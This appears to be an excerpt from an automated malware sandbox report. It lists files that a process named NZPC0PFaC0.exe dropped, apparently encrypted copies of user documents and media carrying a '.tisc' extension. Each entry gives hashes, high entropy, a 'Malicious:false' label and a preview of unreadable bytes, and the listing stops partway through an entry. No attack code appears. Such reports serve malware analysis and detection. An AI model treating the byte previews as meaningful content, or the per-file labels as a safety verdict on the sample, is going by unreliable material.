                                                                                    Preview: ;..0.;.'E..2.ki#...`..Al.2..x.Z.......2w..1..uYD....4e..F.#l..:...{L.k....2.x.....%L.5...T...@C.......B..Z)x...q..#..O....;dot...../.w..I./Ul.PM.H#..H..A.N......./.....nI.9.f....q~.tbH.......7.7.I..9|...M.*<;...E,,9...f;=.+.y..I.h....v.{...i.~>..?.X.D..)...J.9.OB;R..(.........nH%J/..*.J..V..Q.6i.Tw..q..3..-T.....x.............r....V.._.v.z.nJ...+B~G..Im.'._K...t.e.k.d}-w$.(......B.....?..EIv...-..W{..}......$J.^q[.......$G^.$.....&.G....J..Lp....0....iA'C...5&.L.'..a..Wb.!.9....L.7".B...._S..I ...TJlx..:u..6..%.6..w...#.s.H4]...<....5z...b....[....zQ.[._..!Y....Z.:z.J..p...%.<]......b:.i.]BL...S.8yn..-...n.E.q...1...`..6.....=....B>..s.R.s.1...F.wr..V.......c.N4<...ElK".4W..N:n..,...<wY.....83.....a{.3c9v..+..O1.t.7]@.1R...z.5..Mtr7t9...*....am.F......e?p...6i...X.k..C:)....S&_ud...`m..RU.s..z..[@.K...X.;Q..0G4.O. ..5.o..b.,.)ndh..#..[..a..j5n[..a..z.......^.3tN!......o...[~JUX...8xD .....s^g1....<l...;Qu..VP.k.nC...G..N....D.......'.iNZk.R0
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.846794542862296
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDDXgg3xLDz4R/NvbovYdqvzyoU1T+ogDeIEVT9b0RiSWlEGgbD:zQDDHL/sNogd2uoXogDaV2zCEjD
                                                                                    MD5:ADE30438D679E2C2466BBDF8171E19FA
                                                                                    SHA1:DFA4869A881637BC5BF8260C10869597F7442907
                                                                                    SHA-256:45AA9756CFB286CE992BF754E51EE4147059DF0FA7DD26A6C922910D95EF4681
                                                                                    SHA-512:EF3B0F60E6715AAD18D876114A69975DCD194E14443A2E0E8BA0073775407F34A7ACCD319E244930A134995BE1BACCBD19C7E77C1346DD5ACEAC7EE8428C5595
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......p...:o+i.k`....i.........&...dRzd...xf....b.~GG............e.p....Q...f...?..WO..6(.?o.C...0q]o;..q...KL.S..V@.....SL.............n...j...~..i..C.P.p<.S.@....."}..@....R3.M.G...^...p..3X....Vj.)......O.>.....D.....a....4.;.V.Qj..,.i.........Z......{..E..e.m7.....z....m.._.3..m4\.y...6y......s....H..hq.d5k:....A.~.V.....x6.$.<.L.W.'.B.G.+.d[rl..[i8^s....9X......_........(....t...=..S3.#.....`.6.+....jf...........EQT.?....w..}...j..t...c.l...........F...4J.0.)U{..B.s).X..$X.A.a."....r..a>.}.Yt....b.'...7w.-...Z...x..xG<........@.;.....D-_..d.......>w._.~...+....z.4.|E..vT...........h.0,ZL.2.I_..$Zs..X$...^...A..M.V^C......g&..0.v2I.Y..y}Y..#.'..v-,.K..{..N."..}\...~.}+../aL.s....[.|.%`.l..X_.'..S...h...$p..^D..V.....ww.z...B...txK./Q.<...[.7.=...j1..a..-.J.h!......6......4A~<R..t...%.4.._..P"....16....s.....Q We.2. ..T....B]....kS.J;z..f.Z_.r3..h.O......)..[JFT..~.;.&.rO.bo..o........g....n...&Iks..Y..3..d..l...$@p&...@.?
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.846794542862296
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDDXgg3xLDz4R/NvbovYdqvzyoU1T+ogDeIEVT9b0RiSWlEGgbD:zQDDHL/sNogd2uoXogDaV2zCEjD
                                                                                    MD5:ADE30438D679E2C2466BBDF8171E19FA
                                                                                    SHA1:DFA4869A881637BC5BF8260C10869597F7442907
                                                                                    SHA-256:45AA9756CFB286CE992BF754E51EE4147059DF0FA7DD26A6C922910D95EF4681
                                                                                    SHA-512:EF3B0F60E6715AAD18D876114A69975DCD194E14443A2E0E8BA0073775407F34A7ACCD319E244930A134995BE1BACCBD19C7E77C1346DD5ACEAC7EE8428C5595
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......p...:o+i.k`....i.........&...dRzd...xf....b.~GG............e.p....Q...f...?..WO..6(.?o.C...0q]o;..q...KL.S..V@.....SL.............n...j...~..i..C.P.p<.S.@....."}..@....R3.M.G...^...p..3X....Vj.)......O.>.....D.....a....4.;.V.Qj..,.i.........Z......{..E..e.m7.....z....m.._.3..m4\.y...6y......s....H..hq.d5k:....A.~.V.....x6.$.<.L.W.'.B.G.+.d[rl..[i8^s....9X......_........(....t...=..S3.#.....`.6.+....jf...........EQT.?....w..}...j..t...c.l...........F...4J.0.)U{..B.s).X..$X.A.a."....r..a>.}.Yt....b.'...7w.-...Z...x..xG<........@.;.....D-_..d.......>w._.~...+....z.4.|E..vT...........h.0,ZL.2.I_..$Zs..X$...^...A..M.V^C......g&..0.v2I.Y..y}Y..#.'..v-,.K..{..N."..}\...~.}+../aL.s....[.|.%`.l..X_.'..S...h...$p..^D..V.....ww.z...B...txK./Q.<...[.7.=...j1..a..-.J.h!......6......4A~<R..t...%.4.._..P"....16....s.....Q We.2. ..T....B]....kS.J;z..f.Z_.r3..h.O......)..[JFT..~.;.&.rO.bo..o........g....n...&Iks..Y..3..d..l...$@p&...@.?
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848785090996732
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:A34LmAFdgU2QBf1WlSjMeYchhIXB6QE1j9aAoH8BPxTAypkglgDZ8gbD:A3+mqgU2gf1r5TCAoH8BpTAyaglgHD
                                                                                    MD5:CD7A6793DA1E7A86547F6F8424EDB0A3
                                                                                    SHA1:6DC4C4537D0D03539EDBBABC7B573373A3B0C244
                                                                                    SHA-256:3AE4C9A62CA3EFE1C73AEC28ABED0393BFBADC49C5D39E5B391918B32ABD9712
                                                                                    SHA-512:B86262A62EE25574E7A20E5C81A06D4F631A30CE6BC07EE13E5F265A40927562C1C4C0B14381B95CDC6CAA3E26FFA285ECBC3CDE5FB7D5B3B12822936CB14CB8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ".....wV6X.J.Z..$.x..tQ..!$.@..l..X.^.~...........|..#...f.8......._....7z..mVJ...Z....vi~.-.....n..R.:.....jC.]hV....>....T"...clf.S...s.....dy\.Un......gf....=..V...G..I...rIr.s..-.>I.kc...-l ...:...1T.....C[G'....Yc..n57.....V.L:jX....:....W...*..s....;.];..d.`..w._.......-.....t.._........U....XD.X.....t<....i..TY..Se_...d.~....-.0...v......#.B.D..6.M.........).)[.....-..i...._{.......?g.X`..I.f.kd......?.)?.............@..=R.i:.w.+......)..$....]....)%{Oy+=...Q....'....\2..)'..)~.z...GtH.-....|..d.1...X.b....x..j9..wgD|....Y...P...n=.......A..B..O...U.dY.......~=3....]....(o. ^b...n.9...E^s.........}.i.y.T...xso......_/..s.T..{....?.4.j.....-.R[b...7.#.U.v.D...._..j.+....AI...n.2sq.%B.....8..!..x4..o..X.].u.+N.7...Ql.j.&.G=...e9.....f....V*>.3:].d.....1.....00..e...)bS.|...{..AL,e.V...Kt.J..)...2"....ht#.....S?..1..T.t..,g....x.{.\..Ri......D...g...=.>.......!....7E.........{%K.P..?..^.....S.=..3.............mX..C..1.5.
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848785090996732
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:A34LmAFdgU2QBf1WlSjMeYchhIXB6QE1j9aAoH8BPxTAypkglgDZ8gbD:A3+mqgU2gf1r5TCAoH8BpTAyaglgHD
                                                                                    MD5:CD7A6793DA1E7A86547F6F8424EDB0A3
                                                                                    SHA1:6DC4C4537D0D03539EDBBABC7B573373A3B0C244
                                                                                    SHA-256:3AE4C9A62CA3EFE1C73AEC28ABED0393BFBADC49C5D39E5B391918B32ABD9712
                                                                                    SHA-512:B86262A62EE25574E7A20E5C81A06D4F631A30CE6BC07EE13E5F265A40927562C1C4C0B14381B95CDC6CAA3E26FFA285ECBC3CDE5FB7D5B3B12822936CB14CB8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ".....wV6X.J.Z..$.x..tQ..!$.@..l..X.^.~...........|..#...f.8......._....7z..mVJ...Z....vi~.-.....n..R.:.....jC.]hV....>....T"...clf.S...s.....dy\.Un......gf....=..V...G..I...rIr.s..-.>I.kc...-l ...:...1T.....C[G'....Yc..n57.....V.L:jX....:....W...*..s....;.];..d.`..w._.......-.....t.._........U....XD.X.....t<....i..TY..Se_...d.~....-.0...v......#.B.D..6.M.........).)[.....-..i...._{.......?g.X`..I.f.kd......?.)?.............@..=R.i:.w.+......)..$....]....)%{Oy+=...Q....'....\2..)'..)~.z...GtH.-....|..d.1...X.b....x..j9..wgD|....Y...P...n=.......A..B..O...U.dY.......~=3....]....(o. ^b...n.9...E^s.........}.i.y.T...xso......_/..s.T..{....?.4.j.....-.R[b...7.#.U.v.D...._..j.+....AI...n.2sq.%B.....8..!..x4..o..X.].u.+N.7...Ql.j.&.G=...e9.....f....V*>.3:].d.....1.....00..e...)bS.|...{..AL,e.V...Kt.J..)...2"....ht#.....S?..1..T.t..,g....x.{.\..Ri......D...g...=.>.......!....7E.........{%K.P..?..^.....S.=..3.............mX..C..1.5.
                                                                                    C:\Users\user\Documents\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.841662460483488
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:YW0NU4LtwtxOCmIIpyrFGDhBNhhw0dx1/UulRwZJsQwTMRis5ByNh+VQgbD:YRtxCmILMf5sulOJwT/wyNkD
                                                                                    MD5:48C8316ECC537622B8008C172CC00030
                                                                                    SHA1:3701EE5D874DE7C6333664BA9D4249D38FD0C38A
                                                                                    SHA-256:33DF6AE945F49291FA01F990BBC12D96011C1BB06C9CE0232A64E061EB7FA985
                                                                                    SHA-512:8D18E9247C193926BC3AC6F6B5AA1CABCB30CCB5A86A590CBA48EF1FAD1F685327376408EDD7899C1F1039419421393FD71D0072E0E267CAE56F3F34C56737BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..Uz.E./|.T..k....,l<.4..c..2..~..jF.}.*3].\...'....W1......k.k.7|?Vn0u.......t......?,=}(y.d..B.., ..)..b..t.K.Y.Ye.>'].....0.k$........a....."C.U.~k[.s..BpJ$....0..HD.e./.9.I.p2....>...y......f..M.........g...1t..a.......#..@.............].(..%.5I..>....L.`....o[.#}.r}.K{I.j....4........ .^..*.3.R...2..}..\b+...<......e.%.N.q.p.GC%..g...<.U.q)6. ..W0]N.%.D..f..k.r..m..?....'TU.Z\.0......8..p......X5.........s.CO...v(fV.:O...'JG7.-E.K.f.6.8G.....Q<..-...w..(R#..L_..qJp......(...|.....s..`....l......k.`.d3..p...%.U...7..=.R..R.C........Q......`..R.8...9.Q...eyc.q..&pG......:...........I.Lk..L.n.....+....K..;....{?l....e..7..3..f..5...(...UGC.Gf....&.%....3.$:.......5.lI;..7\..+...B.0.'.7.>m_C..ol<:LD.....l...-\.=...9f$. .=b....O..LO..~c.6...f..-j.oN.]..g:...."R..c.RB.......q<M.......P.5109.3F]..A.+.o3........*..E....,c.5\.._Eb.pWef......uzo.^.\.0..6.H.!R..Q...q...z..2m..E..@zz.."..F`A...#.S8 ...n\..4......f...gy|...?....l..=uT..9.'.
                                                                                    C:\Users\user\Documents\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.841662460483488
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:YW0NU4LtwtxOCmIIpyrFGDhBNhhw0dx1/UulRwZJsQwTMRis5ByNh+VQgbD:YRtxCmILMf5sulOJwT/wyNkD
                                                                                    MD5:48C8316ECC537622B8008C172CC00030
                                                                                    SHA1:3701EE5D874DE7C6333664BA9D4249D38FD0C38A
                                                                                    SHA-256:33DF6AE945F49291FA01F990BBC12D96011C1BB06C9CE0232A64E061EB7FA985
                                                                                    SHA-512:8D18E9247C193926BC3AC6F6B5AA1CABCB30CCB5A86A590CBA48EF1FAD1F685327376408EDD7899C1F1039419421393FD71D0072E0E267CAE56F3F34C56737BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..Uz.E./|.T..k....,l<.4..c..2..~..jF.}.*3].\...'....W1......k.k.7|?Vn0u.......t......?,=}(y.d..B.., ..)..b..t.K.Y.Ye.>'].....0.k$........a....."C.U.~k[.s..BpJ$....0..HD.e./.9.I.p2....>...y......f..M.........g...1t..a.......#..@.............].(..%.5I..>....L.`....o[.#}.r}.K{I.j....4........ .^..*.3.R...2..}..\b+...<......e.%.N.q.p.GC%..g...<.U.q)6. ..W0]N.%.D..f..k.r..m..?....'TU.Z\.0......8..p......X5.........s.CO...v(fV.:O...'JG7.-E.K.f.6.8G.....Q<..-...w..(R#..L_..qJp......(...|.....s..`....l......k.`.d3..p...%.U...7..=.R..R.C........Q......`..R.8...9.Q...eyc.q..&pG......:...........I.Lk..L.n.....+....K..;....{?l....e..7..3..f..5...(...UGC.Gf....&.%....3.$:.......5.lI;..7\..+...B.0.'.7.>m_C..ol<:LD.....l...-\.=...9f$. .=b....O..LO..~c.6...f..-j.oN.]..g:...."R..c.RB.......q<M.......P.5109.3F]..A.+.o3........*..E....,c.5\.._Eb.pWef......uzo.^.\.0..6.H.!R..Q...q...z..2m..E..@zz.."..F`A...#.S8 ...n\..4......f...gy|...?....l..=uT..9.'.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.833891322938879
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mec+vygzyt4tb1dULk1FuUAkSl5z9ctZYokx7swjOEXRuOKgbD:D7ygutEb1dUqF1B+xcLYokpHOEXR9D
                                                                                    MD5:16E4F33EB13D45E15E6B4B0DDE9B3B21
                                                                                    SHA1:606D9D70364ECF8B25CA0CCC4282744A977B38ED
                                                                                    SHA-256:5E705828A45D5B4D477AF4BBE3D3145F7867DF7A6B6C5CAAE3A8069416B13ABC
                                                                                    SHA-512:409A2B6E55138D9F344FD4EF0498B3853A726005C7151B7BFC2D1CFAE54FC32C466D1ECE629208B9D84D13836E1726708595731782D8973FC9FDF47CD8D7A8FC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: |?.y..HBw..r.L....#t....D..9...F..R.H..-....!n-.;.0.X.9..1.x......g......G.(....7!=..w.2]..=XZ.*.caP.......\.x_.,%6....V...\..%.fSY.h!)Z4?.P5W.,n[.i.......I......9.Dp5...;YuU.V...J.K\.h......o.z.4B.o.1()~.h\.;.....#`....Tf.%.A.).EBT.).2.hI]13....LU.T.]x.?m.f...ePt)Uk."P....;.tvD[....F....=&e...wb.. .....3..u.0.g.#!X.Z.......=..e.3w.....dh...E1A./..3Ye:z...r/./&s.v.........'..7P}x..r4l_..,p..(J....u...$..cM..7.Xz....si...E...F..&-.q..`.~U...]..`..2,.Y...Q*.P.G.a..k.|.....k.z.xJvZy.{..[...6....../.....ct8.cm,.......m...J..(8...L..*u6`.Z..1..Lu.Y.9...!x^\.<.i...V.+u....0.....eE...p:..R........^...X.P/.s/.;..*.b.9r.U?..........~3...E.i}.t...............l..Z.......]...m.n.Z.!.Z)..0...2H.L.2..F.i..;'+...R],fZ..v...[....Q.N..f>..h..:....^NG.5....b..T.K..~.......P.....f...b9.D..Z[b~]B..w8f...g..v..y.&...).....)...^..`.y..O.<.y?R4.....(..t....I.Q..X,/.A/\.f....c.G........5..\"$...U@...S.X..w)T...y(C]j.....B.a<..5.$P...,..O{..q...2..:Uh8.J.,.g.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.833891322938879
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mec+vygzyt4tb1dULk1FuUAkSl5z9ctZYokx7swjOEXRuOKgbD:D7ygutEb1dUqF1B+xcLYokpHOEXR9D
                                                                                    MD5:16E4F33EB13D45E15E6B4B0DDE9B3B21
                                                                                    SHA1:606D9D70364ECF8B25CA0CCC4282744A977B38ED
                                                                                    SHA-256:5E705828A45D5B4D477AF4BBE3D3145F7867DF7A6B6C5CAAE3A8069416B13ABC
                                                                                    SHA-512:409A2B6E55138D9F344FD4EF0498B3853A726005C7151B7BFC2D1CFAE54FC32C466D1ECE629208B9D84D13836E1726708595731782D8973FC9FDF47CD8D7A8FC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: |?.y..HBw..r.L....#t....D..9...F..R.H..-....!n-.;.0.X.9..1.x......g......G.(....7!=..w.2]..=XZ.*.caP.......\.x_.,%6....V...\..%.fSY.h!)Z4?.P5W.,n[.i.......I......9.Dp5...;YuU.V...J.K\.h......o.z.4B.o.1()~.h\.;.....#`....Tf.%.A.).EBT.).2.hI]13....LU.T.]x.?m.f...ePt)Uk."P....;.tvD[....F....=&e...wb.. .....3..u.0.g.#!X.Z.......=..e.3w.....dh...E1A./..3Ye:z...r/./&s.v.........'..7P}x..r4l_..,p..(J....u...$..cM..7.Xz....si...E...F..&-.q..`.~U...]..`..2,.Y...Q*.P.G.a..k.|.....k.z.xJvZy.{..[...6....../.....ct8.cm,.......m...J..(8...L..*u6`.Z..1..Lu.Y.9...!x^\.<.i...V.+u....0.....eE...p:..R........^...X.P/.s/.;..*.b.9r.U?..........~3...E.i}.t...............l..Z.......]...m.n.Z.!.Z)..0...2H.L.2..F.i..;'+...R],fZ..v...[....Q.N..f>..h..:....^NG.5....b..T.K..~.......P.....f...b9.D..Z[b~]B..w8f...g..v..y.&...).....)...^..`.y..O.<.y?R4.....(..t....I.Q..X,/.A/\.f....c.G........5..\"$...U@...S.X..w)T...y(C]j.....B.a<..5.$P...,..O{..q...2..:Uh8.J.,.g.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842768042198242
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AX1kAxwUVdVFhq/ALflV8t81zxutyA8FCKt47pg92ePQ8ngbD:KkyVXFtMt86yAsG7qPQ86D
                                                                                    MD5:5B9EE7E3797BB2F5946BA30A2A77E424
                                                                                    SHA1:EE4C215DDDA04E37141FCBE282AA8023BF173C85
                                                                                    SHA-256:1367227D3912F1A7FE72D0730AE13506D8EF6D0853811D2E998F21CD759A949A
                                                                                    SHA-512:CFDB1F14B2D3114B14C22B71D49DCDC18E4E2B8E655260F01E08B43BAA60D2D67E1F327988E7E2562DB3265303BEA186DA4FDC97D274F68711E1090B7C376070
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: J.....q?.x.a\.X..T.B.X./...v.Q+....|..(.....JIzf.E..H{L".'.M.?......e3N..x.i...y..&...(....... S.+.......z.J.l......Cr-.Lu.9.....' =.:..9+$..0......6d.oW.k..|w......Oz......M.<W{j.n.....o.....t...UZE.w...F...!K.....C.......G........6=..m'...`.^./L.S..\.#.....L7+X_..Et...s..Wc.HD..a..._....)...J.Q18......T.L...F...K..e.....U.nTlFx.'.....g~.A...tK..aO.<.B1z],..`....E.....Q.,.uBo.I....n...R..L1+.Q... .1I..u.>w..!f..^..^..g..f....B.uZ...d.{.^W...}g..Z.P..?...............k-. @uR...M.`&......<c..va..........5:.BTv/.N.].Q."DS..d......Kl.gi.:......a........1.~...J.x.rNR.....9a9OG..!..T).=m.....K.....L...+\X<9.k.%-:..M...d"Qs~.,..8..0Dr'.{@....t.>.&.w.....(..#......S.#.sb....f.sbE..R..%T....&A.&j...V....a.G.....0.=.'.q.....T.|...=.@tYs.Xd|+si........0/T.......x.4my.T.........p.. r.K]...?[..T|.........g{.l....&........?...........n...|.E.M...^.W-..V)X....\......d....=...*...%.......[...K.!.. r=>....ET.z\.Y-^....}w1...Q$t.M..l...Xz..n..cQ.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842768042198242
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AX1kAxwUVdVFhq/ALflV8t81zxutyA8FCKt47pg92ePQ8ngbD:KkyVXFtMt86yAsG7qPQ86D
                                                                                    MD5:5B9EE7E3797BB2F5946BA30A2A77E424
                                                                                    SHA1:EE4C215DDDA04E37141FCBE282AA8023BF173C85
                                                                                    SHA-256:1367227D3912F1A7FE72D0730AE13506D8EF6D0853811D2E998F21CD759A949A
                                                                                    SHA-512:CFDB1F14B2D3114B14C22B71D49DCDC18E4E2B8E655260F01E08B43BAA60D2D67E1F327988E7E2562DB3265303BEA186DA4FDC97D274F68711E1090B7C376070
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: J.....q?.x.a\.X..T.B.X./...v.Q+....|..(.....JIzf.E..H{L".'.M.?......e3N..x.i...y..&...(....... S.+.......z.J.l......Cr-.Lu.9.....' =.:..9+$..0......6d.oW.k..|w......Oz......M.<W{j.n.....o.....t...UZE.w...F...!K.....C.......G........6=..m'...`.^./L.S..\.#.....L7+X_..Et...s..Wc.HD..a..._....)...J.Q18......T.L...F...K..e.....U.nTlFx.'.....g~.A...tK..aO.<.B1z],..`....E.....Q.,.uBo.I....n...R..L1+.Q... .1I..u.>w..!f..^..^..g..f....B.uZ...d.{.^W...}g..Z.P..?...............k-. @uR...M.`&......<c..va..........5:.BTv/.N.].Q."DS..d......Kl.gi.:......a........1.~...J.x.rNR.....9a9OG..!..T).=m.....K.....L...+\X<9.k.%-:..M...d"Qs~.,..8..0Dr'.{@....t.>.&.w.....(..#......S.#.sb....f.sbE..R..%T....&A.&j...V....a.G.....0.=.'.q.....T.|...=.@tYs.Xd|+si........0/T.......x.4my.T.........p.. r.K]...?[..T|.........g{.l....&........?...........n...|.E.M...^.W-..V)X....\......d....=...*...%.......[...K.!.. r=>....ET.z\.Y-^....}w1...Q$t.M..l...Xz..n..cQ.
                                                                                    C:\Users\user\Documents\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843915102335361
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:57fz+NXd5iQZHlXX16Mw1SxDl5/lvb4ayA09V2ZMGAytId+1gSqTsKlqd3gbD:xfa5DhBEMw149TyA/ZM2U+U42qkD
                                                                                    MD5:680FF5F32DE5977A3FC60A2A4EC7F067
                                                                                    SHA1:9C7BD788ADBA66A5CEA8D70BE3D0CC315C418705
                                                                                    SHA-256:1EA5C1D218DB399DD733F215BF327FE81557B33591EDE014CF2173F2F4A5AE22
                                                                                    SHA-512:74F7ABBF917FDFBF08A1377D65362D03F8985249AE548D9DB6782121DAF986C84764FE8F9AAEF15BABE4246394AB5F9497F709741C1F95F1810870483BF7FFB5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: IWr.X..,yV.R....,....CX.$..}.......)<gC.p...'......Z#.....V.v...n....pk.v.]..,.x...".........9../..5Ei.C.ah..1.(.TVwaEw..m./..wM..p....u .....[.X..^....B..-.._.......)....Q..JU.U.z......T...}.K....!...S#CB.......e..z[...d..| +m.E.yks........:....m...'K..I..|.*./..IG..w.1R....N...2M+...|y ..MeE...K.\6%E.....j#f;w..6......'h.k../+...^..a....n\.5}v.......m}.X"G.Vu1.q.;....w...A,.M,.....R."..^k....k..*.0...@`..|..{..FF7..G.@+o}.I...U......j.O..W[...\..:K.....==..i<%p...T..J.3...q.xBi6.%....p...N8.D..vb........4..Ed...s..h..V.Zd.\{R.....;.&..66..j.....J....q..W)...A.9...2..K...lq.....J^.".#..{.6.....$.O.,...)3....2*^....;4..V5./'~T76.<.....x.g.'...o..CN...mb.yC..'.P........d.>;Av.{..2. ....C.^<..abV.....w8\.fCti...M....f..h.....{B......E>3.\......D:s..w5.%..S.P.....[.M\.FU.t.d..:k.Q.F..4/.|X.=<..OA.6...n..^p.?q.aJ.b:....!.9.3......&y........>A.G._k<..E.U..b....9b|.}j*.q...(D J...Y.\B........Z..Q.W.'.l..:...wV.i....9.$.< :g..'O4.
                                                                                    C:\Users\user\Documents\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843915102335361
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:57fz+NXd5iQZHlXX16Mw1SxDl5/lvb4ayA09V2ZMGAytId+1gSqTsKlqd3gbD:xfa5DhBEMw149TyA/ZM2U+U42qkD
                                                                                    MD5:680FF5F32DE5977A3FC60A2A4EC7F067
                                                                                    SHA1:9C7BD788ADBA66A5CEA8D70BE3D0CC315C418705
                                                                                    SHA-256:1EA5C1D218DB399DD733F215BF327FE81557B33591EDE014CF2173F2F4A5AE22
                                                                                    SHA-512:74F7ABBF917FDFBF08A1377D65362D03F8985249AE548D9DB6782121DAF986C84764FE8F9AAEF15BABE4246394AB5F9497F709741C1F95F1810870483BF7FFB5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: IWr.X..,yV.R....,....CX.$..}.......)<gC.p...'......Z#.....V.v...n....pk.v.]..,.x...".........9../..5Ei.C.ah..1.(.TVwaEw..m./..wM..p....u .....[.X..^....B..-.._.......)....Q..JU.U.z......T...}.K....!...S#CB.......e..z[...d..| +m.E.yks........:....m...'K..I..|.*./..IG..w.1R....N...2M+...|y ..MeE...K.\6%E.....j#f;w..6......'h.k../+...^..a....n\.5}v.......m}.X"G.Vu1.q.;....w...A,.M,.....R."..^k....k..*.0...@`..|..{..FF7..G.@+o}.I...U......j.O..W[...\..:K.....==..i<%p...T..J.3...q.xBi6.%....p...N8.D..vb........4..Ed...s..h..V.Zd.\{R.....;.&..66..j.....J....q..W)...A.9...2..K...lq.....J^.".#..{.6.....$.O.,...)3....2*^....;4..V5./'~T76.<.....x.g.'...o..CN...mb.yC..'.P........d.>;Av.{..2. ....C.^<..abV.....w8\.fCti...M....f..h.....{B......E>3.\......D:s..w5.%..S.P.....[.M\.FU.t.d..:k.Q.F..4/.|X.=<..OA.6...n..^p.?q.aJ.b:....!.9.3......&y........>A.G._k<..E.U..b....9b|.}j*.q...(D J...Y.\B........Z..Q.W.'.l..:...wV.i....9.$.< :g..'O4.
                                                                                    C:\Users\user\Documents\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.824635221778756
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/BtQG19Ue0IQxTIB8FZoGtmzuoB3VhxBQqF7YuNRxFugbD:BTvkMyFZV8uo9VhxBQqvNbFrD
                                                                                    MD5:2565DEE85A2009321F465C65AFDBBA7E
                                                                                    SHA1:61EF27CB437ABC58E9570FD1A0C5423324ACBF8A
                                                                                    SHA-256:8DA1AED9F5BE213384399683D38008E1B4DC9A1E06D59CF52FC4858402022217
                                                                                    SHA-512:10D7F0DE115BC2C1F7722CB651792AB5F000EA8AAA243BDDF9AD4DA0B9E4263379DA2CEE7A68516A5EEB068228BE14ECA8DA0B525FCF2B4FE76DF90FD9AEC424
